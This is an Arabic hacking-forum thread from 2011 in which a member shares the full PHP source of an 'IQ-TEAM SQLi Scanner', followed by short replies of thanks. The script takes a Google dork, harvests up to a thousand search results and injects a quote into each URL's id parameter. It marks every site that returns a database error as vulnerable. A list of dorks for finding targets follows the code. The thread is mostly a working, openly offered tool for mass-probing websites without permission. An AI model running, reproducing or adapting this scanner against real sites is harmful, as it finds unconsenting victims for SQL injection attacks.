1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : احمد العراقي | المشاهدات : 35,385 | الردود : 7
حالة الموضوع:
مغلق
  1. احمد العراقي

    احمد العراقي ExpErt DeveloPer

    الأنتساب:
    ‏17 سبتمبر 2011
    المشاركات:
    164
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الإقامة:
    ~ IQ-T34M ~
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    Facebook:
    YouTube:
    [​IMG]

    السلام عليكم و رحمة الله تعالى و بركاته

    اليوم احبائي اتممت التعديل على سكربت البحث عن تغرات الSQL
    و عملتله موقع خاص فيه للمنتدى
    كما اضفت معه بعض الدوركات الحديثة
    واضفت الهيدر طبعا
    كما قمت بتعريبه
    الكود سورس
    كود PHP:
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
    <title>IQ - TEAM SQLi Scanner </title>
    <style>
    body{
    background: #111010;
    color: #F9F9F9;
    font-family: monospace;
    font-size: 12px;

    }

    input{
    background: #111010;
    border: 2px solid #d00a2a;
    color: #ffff00;
    }

    h2{
    color: #55FFCC;
    }

    a{ color: #5A5A5A; text-decoration: none; }
    a:visited, a:active{ color: #5C5C5C; text-decoration: line-through; }
    a:hover{ color: #00FFCC; text-decoration: line-through; }
    .effectok:hover { text-decoration: underline; }
    .effectfalse:hover { text-decoration: line-through; }

    </style>

    </head>

    <div id="header">
      <div class="right"></div>
      <div class="left"></div>
        <div class="mid">
          <div align="center"><img src="http://www.iq.x10.bz/vb/web2/red-style/hatshy_header01.png" width="365" height="295" border="0" align="top" usemap="#Map">
    <map name="Map" id="Map"><area shape="rect" coords="314,262,353,275" href="http://www.iq.x10.bz/" target="_self" alt="الرئيسية">
    <area shape="rect" coords="261,262,304,276" href="http://www.iq.x10.bz/vb" target="_self" alt="المنتدى">
    <area shape="rect" coords="163,261,254,276" href="http://www.iq.x10.bz/vb" target="_self" alt="الدورات الإحترافية">
    <area shape="rect" coords="68,262,155,276" href="http://www.iq.x10.bz/vb/f20.html" target="_self" alt="SQL-injection">
    <area shape="rect" coords="14,263,58,275" href="sendmessage.php" target="_self" alt="اتصل بنا">
    </map></div>
      </div>
    </div>
    <body align="center">
    <div align=center>

    <?php
    echo "<h1>ArHack TEAM SQLi Scanner<BR></h1>";
    echo 
    "<form action='' method='post'>";
    echo 
    "<b><h3>Dork الدورك</h3> <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
    echo 
    "<input type='submit' value='  GO! '>";
    echo 
    "<hr><br />";

    if(
    $_POST['dork']) {

    @
    set_time_limit(0);
    @
    error_reporting(0);
    @
    ignore_user_abort(true);
    ini_set('memory_limit''128M');

    $google "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

    $i 0;
    $a 0;
    $b 0;

    while(
    $b <= 900) {
    $a 0;
    flush(); ob_flush();
    echo 
    "@ Pages: [ $b ]<br />";
    echo 
    "@ Dork: [ <b>".$_POST['dork']."</b> ]<br />";
    echo 
    "@ Google Scanner ! .<br />";
    flush(); ob_flush();

    if(
    preg_match("/did not match any documents/"Connect_Host(str_replace(array("REPLACE_DORK""REPLACE_START"), array("".$_POST['dork']."""$b"), $google)), $val)) {
    echo 
    "See something but not found??<br />";
    flush(); ob_flush();
    break;
    }

    preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/"Connect_Host(str_replace(array("REPLACE_DORK""REPLACE_START"), array("".$_POST['dork']."""$b"), $google)), $sites);
    echo 
    "Result of injection...<br />";
    flush(); ob_flush();
    while(
    1) {

    if(
    preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/"Connect_Host(str_replace("=""='"$sites[2][$a])))) {
    echo 
    "<a href='".Clean(str_replace("=""='"$sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=""='"$sites[2][$a])."</a> <== <font color='green'>  الموقع مصـــاب انا بريء منك- Yeah..Vulnerable ! </font><br />";
    } else {
    echo 
    "<a href='".Clean(str_replace("=""='"$sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=""='"$sites[2][$a])."</a> <== <font color='red'> الموقع غير مـصــابNot Vulnerable..sorry! </font><br />";
    flush(); ob_flush();
    }
    if(
    $a count($sites[2])-2) {
    echo 
    "Lets..scan other page.. <br />";
    break;
    }
    $a $a+1;
    }
    $b $b+100;
    }
    }

    function 
    Connect_Host($url) {
    $ch curl_init();
    curl_setopt($chCURLOPT_FOLLOW0);
    curl_setopt($chCURLOPT_HEADER1);
    curl_setopt($chCURLOPT_URL$url);
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_TIMEOUT30);
    $data curl_exec($ch);
    if(
    $data) {
    return 
    $data;
    } else {
    return 
    0;
    }
    }

    function 
    Clean($text) {
    return 
    htmlspecialchars($textENT_QUOTES);
    }

    ?>
    </div>
    </body>
    </html> 

    <center><br><B>|IQ-T34M 2011 © All Rights reserved|</B> <td> 
    </br><p>
    <center> <font color="#D00A2A"><B>We KeeP It ReaL</B><br />By <br />~AHMAD~</font><br /><br />انا بريء من كل من استعملها في ما يخالف ديننا الحنيف <br />تحياتي~<br />D0n3.</center>

    <div align="left">
    Dork 2011 دوركات<br /><br />
    inurl:son.php?idld=<br />
    inurl:special.php?id=<br />
    inurl:club.php?id=<br />
    inurl:colum.php?id=<br />

    inurl:papier.php?id=<br />
    inurl:carton.php?id=<br />
    inurl:learn.php?id=<br />
    inurl:jour.php?id=<br />
    inurl:money.php?id=<br />
    inurl:profile.php?id=<br />
    inurl:go.php?=id<br />

    [​IMG]
     
  2. MrZead0

    MrZead0 Developer

    الأنتساب:
    ‏13 يناير 2012
    المشاركات:
    22
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    تسلم ايدك ياغالى
    مبدع
     
  3. ŠŦэâm

    ŠŦэâm Developer

    الأنتساب:
    ‏26 ديسمبر 2011
    المشاركات:
    30
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    PC
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    بطل واصل ياكنق
     
  4. Tej HAcKEr

    Tej HAcKEr DeveloPer Plus

    الأنتساب:
    ‏15 ديسمبر 2011
    المشاركات:
    133
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الوظيفة:
    hacker
    الإقامة:
    Tunisia
    نظام التشغيل:
    Unix
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    وَعليـَكم السلآم ورحمهَ اللهُ وبركآتهُ
    [​IMG]

    مَوضَوعُجـَميل


    يعطيُك الفَ عآفيُه
    [​IMG]
     
  5. shbl

    shbl Developer

    الأنتساب:
    ‏7 مارس 2012
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    السعوديه
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    مشكور ولك مودتي
    منتظرين جديدك
     
  6. مسعود

    مسعود Developer

    الأنتساب:
    ‏9 مارس 2012
    المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    بطلُ اخـُويُ
     
  7. Wo0oLf

    Wo0oLf DeveloPer Plus

    الأنتساب:
    ‏22 مارس 2012
    المشاركات:
    123
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الوظيفة:
    طالب جامعي Computer science
    الإقامة:
    مقيم في لبنان
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    وعليكم السلآم ورحمة الله وبركآته ،،
    يعطيك ألف ع ـآفية ،
     
  8. كلآشنكوف

    كلآشنكوف Developer

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    88
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    شكرا لك على الموضوع الجميل و المفيذ ♥

    جزاك الله الف خير على كل ما تقدمه لهذا المنتدى
    :{1}:

    ننتظر ابداعاتك الجميلة بفارغ الصبر
    :{8}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة